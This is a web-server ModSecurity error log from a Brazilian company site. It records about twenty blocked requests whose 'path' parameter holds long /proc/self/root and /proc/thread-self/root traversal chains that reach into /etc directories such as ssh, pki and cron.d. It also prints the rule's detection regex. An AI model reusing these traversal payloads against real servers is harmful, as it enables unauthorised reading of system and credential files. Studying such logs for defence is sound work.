[Thu Mar 19 04:43:15.327498 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.241.31:59782] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupE9a6ubjKNq_cu4YP0gAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:43:18.893855 2026] [:error] [pid 27403:tid 140411708356352] [client 74.7.241.31:59790] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupFhkFeYa1D6dYQnC8jQAAAcQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:43:19.893122 2026] [:error] [pid 27293:tid 140411641214720] [client 74.7.243.128:43476] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupF_-YZRR_7pZ7nDJbxgAAA8w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:43:21.240866 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:45290] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupGda6ubjKNq_cu4YP1wAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:43:22.539345 2026] [:error] [pid 19093:tid 140411691570944] [client 74.7.243.128:45306] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupGl_V7PWP6ixUYl6KswAAAoY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:43:23.251077 2026] [:error] [pid 14269:tid 140411557287680] [client 74.7.241.31:37566] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupGwbLMZ6AikZjR9Ur_gAAABY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:43:23.812668 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.243.128:45322] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupG_u8EFLIOrSqIptr8gAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:43:25.978861 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.241.31:37570] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupHeoXxyEfFpUF8f_e-wAAAUk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:43:27.748618 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.241.31:44688] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupH9a6ubjKNq_cu4YP5QAAA1E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:43:30.008568 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.243.128:45330] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupIvu8EFLIOrSqIptr9gAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:43:35.390936 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.241.31:44696] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupJwkwaGbbGflqUZCDRAAAANQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:43:35.619639 2026] [:error] [pid 14269:tid 140411699963648] [client 74.7.243.128:49404] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupJwbLMZ6AikZjR9UsBgAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:43:38.036442 2026] [:error] [pid 30077:tid 140411590858496] [client 74.7.243.128:49420] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupKvu8EFLIOrSqIptr-QAAAlI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:43:39.321303 2026] [:error] [pid 17887:tid 140411548894976] [client 74.7.243.128:49428] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupKwkwaGbbGflqUZCDRQAAANc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:43:40.674940 2026] [:error] [pid 19093:tid 140411590858496] [client 74.7.243.128:37210] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupLF_V7PWP6ixUYl6KuwAAApI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:43:41.234882 2026] [:error] [pid 27403:tid 140411548894976] [client 74.7.241.31:44708] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupLRkFeYa1D6dYQnC8mQAAAdc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:43:41.970942 2026] [:error] [pid 27293:tid 140411599251200] [client 74.7.243.128:37222] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupLf-YZRR_7pZ7nDJb0AAAA9E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:43:42.488764 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.241.31:39500] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupLuoXxyEfFpUF8f_fAgAAAVg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:43:43.271008 2026] [:error] [pid 17887:tid 140411708356352] [client 74.7.243.128:37234] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupLwkwaGbbGflqUZCDRwAAAMQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:43:51.363301 2026] [:error] [pid 30077:tid 140411725141760] [client 74.7.243.128:37236] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupN_u8EFLIOrSqIptsAgAAAkI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:43:53.727498 2026] [:error] [pid 31803:tid 140411565680384] [client 74.7.241.31:39508] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupOeyqAr6etmhZHNoyMAAAAFU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
